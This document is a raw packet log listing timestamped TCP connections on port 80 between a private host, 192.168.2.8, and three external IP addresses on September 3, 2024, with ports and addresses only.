Sep 3, 2024 17:13:20.949157000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949215889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949227095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949237108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949276924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949276924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949321032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949331999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949342012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949347973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949357986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949368954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949378014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949388027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949388027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949395895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949412107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949441910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949606895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949649096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949655056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949672937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949683905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949714899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949729919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949740887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949783087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949795008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949810982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949821949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949831963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949841976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949848890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949848890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949884892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949884892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950227976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950243950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950254917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950264931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950274944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950295925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950331926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950331926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950354099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950365067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950375080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950386047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950397015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950408936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950411081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950440884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950440884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950635910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950647116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950656891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950668097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950679064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950690031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950699091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950701952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950714111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950716019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950726032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.950759888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950759888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.950792074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951076031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951086998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951097012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951107025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951117992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951121092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951123953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951136112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951136112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951148033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951158047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951169968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951174021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951199055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951199055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951559067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951570034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951581001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951591969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951601982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951612949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951623917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951625109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951634884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951647043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951657057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951666117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951666117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951668024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951679945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951689959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951699972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951702118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951702118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951711893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951723099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951730013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951735020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.951777935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.951827049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952366114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952377081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952387094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952403069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952414036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952424049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952430964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952430964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952435970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952449083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952459097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952469110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952478886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952486038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952486038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952497959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952501059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952517033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952527046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952529907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952541113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952552080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952560902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952569962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952569962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952570915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952584982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952595949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952603102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952603102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952608109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952619076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952630043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952636957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952642918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.952665091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.952665091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.994241953 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.994255066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.994266033 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.994302034 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.994335890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.046243906 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.046580076 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.051572084 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:21.051978111 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.052880049 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.053683043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053694963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053705931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053772926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053772926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053778887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053793907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053805113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053817034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053837061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053837061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053857088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053888083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053900003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053914070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053925991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053929090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053941011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053952932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053956032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053956032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053968906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053975105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053975105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.053982019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.053988934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054001093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054011106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054011106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054012060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054025888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054035902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054047108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054048061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054048061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054061890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054063082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054074049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054101944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054101944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054128885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054140091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054150105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054161072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054172039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054179907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054179907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054182053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054193974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054205894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054218054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054219007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054229975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054229975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054248095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054264069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054265976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054277897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054290056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054295063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054295063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054301023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054312944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054327011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054338932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054349899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054357052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054357052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054357052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054366112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054374933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054409981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054415941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.054981947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.054996014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055006027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055016041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055027008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055032015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055037975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055049896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055059910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055068970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055074930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055082083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055089951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055092096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055104971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055116892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055130959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055134058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055140972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055151939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055152893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055152893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055165052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055176973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055186033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055200100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055206060 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055212021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055223942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055228949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055228949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055237055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055248022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055260897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055260897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055274010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055279970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055286884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055305004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055324078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055902958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055917025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055927992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055938005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055952072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055955887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055963039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055969000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.055977106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055988073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.055998087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056010008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056011915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056026936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056035995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056035995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056039095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056051970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056061029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056063890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056072950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056087017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056096077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056107044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056107998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056111097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056122065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056135893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056145906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056155920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056164980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056164980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056166887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056180000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056190968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056205034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056206942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056227922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056279898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056879997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056891918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056906939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056921005 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:21.056929111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056940079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056945086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056952000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056962013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056972027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056977034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056981087 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.056986094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.056997061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.056998014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.057007074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.057012081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.057023048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.057034969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.057039976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.057039976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.057045937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.057070017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.057113886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.057790995 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:21.093903065 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.093960047 CEST	49726	80	192.168.2.8	185.215.113.17
